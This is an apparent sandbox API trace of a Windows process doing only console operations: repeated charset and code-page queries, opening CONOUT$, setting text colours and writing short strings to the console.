	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.363] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.363] GetLastError () returned 0xcb
	[0090.363] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.364] GetLastError () returned 0xcb
	[0090.364] GetConsoleOutputCP () returned 0x1b5
	[0090.364] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.365] GetLastError () returned 0xcb
	[0090.365] GetConsoleOutputCP () returned 0x1b5
	[0090.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.366] GetLastError () returned 0xcb
	[0090.366] GetConsoleOutputCP () returned 0x1b5
	[0090.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.366] GetLastError () returned 0xcb
	[0090.366] GetConsoleOutputCP () returned 0x1b5
	[0090.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.366] GetLastError () returned 0xcb
	[0090.366] GetConsoleOutputCP () returned 0x1b5
	[0090.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.366] GetLastError () returned 0xcb
	[0090.366] GetConsoleOutputCP () returned 0x1b5
	[0090.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.366] GetLastError () returned 0xcb
	[0090.366] GetConsoleOutputCP () returned 0x1b5
	[0090.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.366] GetLastError () returned 0xcb
	[0090.366] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.367] GetLastError () returned 0xcb
	[0090.367] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.368] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.368] GetLastError () returned 0xcb
	[0090.368] GetConsoleOutputCP () returned 0x1b5
	[0090.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.369] GetLastError () returned 0xcb
	[0090.369] GetConsoleOutputCP () returned 0x1b5
	[0090.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.369] GetLastError () returned 0xcb
	[0090.369] GetConsoleOutputCP () returned 0x1b5
	[0090.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.369] GetLastError () returned 0xcb
	[0090.369] GetConsoleOutputCP () returned 0x1b5
	[0090.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.369] GetLastError () returned 0xcb
	[0090.369] GetConsoleOutputCP () returned 0x1b5
	[0090.369] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea40, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea40) returned 0
	[0090.369] GetLastError () returned 0xcb
	[0090.373] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17
	[0090.374] GetLastError () returned 0xcb
	[0090.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.375] GetLastError () returned 0xcb
	[0090.375] GetConsoleOutputCP () returned 0x1b5
	[0090.375] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x43aea20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x43aea20) returned 0
	[0090.375] GetLastError () returned 0xcb
	[0090.375] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0090.375] GetLastError () returned 0xcb
	[0090.375] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x43aea90 | out: lpMode=0x43aea90) returned 1
	[0090.375] GetLastError () returned 0xcb
	[0090.378] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b
	[0090.379] GetLastError () returned 0xcb
	[0090.379] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.379] GetLastError () returned 0xcb
	[0090.381] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f
	[0090.381] GetLastError () returned 0xcb
	[0090.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.381] GetLastError () returned 0xcb
	[0090.384] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.384] GetLastError () returned 0xcb
	[0090.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.384] GetLastError () returned 0xcb
	[0090.385] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0090.385] GetLastError () returned 0xcb
	[0090.385] CloseHandle (hObject=0x23) returned 1
	[0090.385] GetLastError () returned 0xcb
	[0090.388] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.388] GetLastError () returned 0xcb
	[0090.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.388] GetLastError () returned 0xcb
	[0090.388] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0090.388] GetLastError () returned 0xcb
	[0090.388] CloseHandle (hObject=0x23) returned 1
	[0090.388] GetLastError () returned 0xcb
	[0090.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0090.389] GetLastError () returned 0xcb
	[0090.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x43aea28 | out: lpMode=0x43aea28) returned 1
	[0090.389] GetLastError () returned 0xcb
	[0090.392] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.392] GetLastError () returned 0xcb
	[0090.393] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.393] GetLastError () returned 0xcb
	[0090.393] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x19a3120*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a3120*, lpNumberOfCharsWritten=0x43aea0c*=0x4f) returned 1
	[0090.394] GetLastError () returned 0xcb
	[0090.394] CloseHandle (hObject=0x23) returned 1
	[0090.394] GetLastError () returned 0xcb
	[0090.397] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.397] GetLastError () returned 0xcb
	[0090.397] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.397] GetLastError () returned 0xcb
	[0090.397] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0090.397] GetLastError () returned 0xcb
	[0090.397] CloseHandle (hObject=0x23) returned 1
	[0090.397] GetLastError () returned 0xcb
	[0090.400] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.400] GetLastError () returned 0xcb
	[0090.400] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.400] GetLastError () returned 0xcb
	[0090.400] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
	[0090.400] GetLastError () returned 0xcb
	[0090.400] CloseHandle (hObject=0x23) returned 1
	[0090.401] GetLastError () returned 0xcb
	[0090.403] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.403] GetLastError () returned 0xcb
	[0090.403] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.404] GetLastError () returned 0xcb
	[0090.404] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.404] GetLastError () returned 0xcb
	[0090.404] CloseHandle (hObject=0x23) returned 1
	[0090.404] GetLastError () returned 0xcb
	[0090.407] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0090.407] GetLastError () returned 0xcb
	[0090.407] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.407] GetLastError () returned 0xcb
	[0090.410] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27
	[0090.410] GetLastError () returned 0xcb
	[0090.410] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.410] GetLastError () returned 0xcb
	[0090.413] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b
	[0090.413] GetLastError () returned 0xcb
	[0090.413] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.413] GetLastError () returned 0xcb
	[0090.416] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.416] GetLastError () returned 0xcb
	[0090.416] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.416] GetLastError () returned 0xcb
	[0090.416] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0090.416] GetLastError () returned 0xcb
	[0090.416] CloseHandle (hObject=0x2f) returned 1
	[0090.417] GetLastError () returned 0xcb
	[0090.419] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.419] GetLastError () returned 0xcb
	[0090.419] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.419] GetLastError () returned 0xcb
	[0090.419] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
	[0090.420] GetLastError () returned 0xcb
	[0090.420] CloseHandle (hObject=0x2f) returned 1
	[0090.420] GetLastError () returned 0xcb
	[0090.422] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.422] GetLastError () returned 0xcb
	[0090.422] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x43aea0c | out: lpMode=0x43aea0c) returned 1
	[0090.423] GetLastError () returned 0xcb
	[0090.423] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x19a3844*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x43aea0c, lpReserved=0x0 | out: lpBuffer=0x19a3844*, lpNumberOfCharsWritten=0x43aea0c*=0x4f) returned 1
	[0090.423] GetLastError () returned 0xcb
	[0090.423] CloseHandle (hObject=0x2f) returned 1
	[0090.423] GetLastError () returned 0xcb
	[0090.425] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.426] GetLastError () returned 0xcb
	[0090.426] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.426] GetLastError () returned 0xcb
	[0090.426] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0090.426] GetLastError () returned 0xcb
	[0090.426] CloseHandle (hObject=0x2f) returned 1
	[0090.426] GetLastError () returned 0xcb
	[0090.429] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.429] GetLastError () returned 0xcb
	[0090.429] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x43ae9bc | out: lpConsoleScreenBufferInfo=0x43ae9bc) returned 1
	[0090.429] GetLastError () returned 0xcb
	[0090.429] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
	[0090.429] GetLastError () returned 0xcb
	[0090.429] CloseHandle (hObject=0x2f) returned 1
	[0090.429] GetLastError () returned 0xcb
	[0090.432] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.432] GetLastError () returned 0xcb
	[0090.432] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x43aea4c | out: lpMode=0x43aea4c) returned 1
	[0090.432] GetLastError () returned 0xcb
	[0090.432] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x12d9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x43aea4c, lpReserved=0x0 | out: lpBuffer=0x12d9938*, lpNumberOfCharsWritten=0x43aea4c*=0x1) returned 1
	[0090.432] GetLastError () returned 0xcb
	[0090.432] CloseHandle (hObject=0x2f) returned 1
	[0090.432] GetLastError () returned 0xcb
	[0090.435] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f
	[0090.435] GetLastError () returned 0xcb
	[0090.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x43aea18 | out: lpConsoleScreenBufferInfo=0x43aea18) returned 1
	[0090.435] GetLastError () returned 0xcb
	[0090.438] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33
	[0090.438] GetLastError () returned 0xcb
	[0090.438] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.438] GetLastError () returned 0xcb
	[0090.441] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37
	[0090.441] GetLastError () returned 0xcb
	[0090.441] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x43ae9b8 | out: lpConsoleScreenBufferInfo=0x43ae9b8) returned 1
	[0090.441] GetLastError () returned 0xcb
	[0090.444] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b
	[0090.444] GetLastError () returned 0xcb
	[0090.444] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x43ae9c0 | out: lpConsoleScreenBufferInfo=0x43ae9c0) returned 1
	[0090.444] GetLastError () returned 0xcb
	[0090.444] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
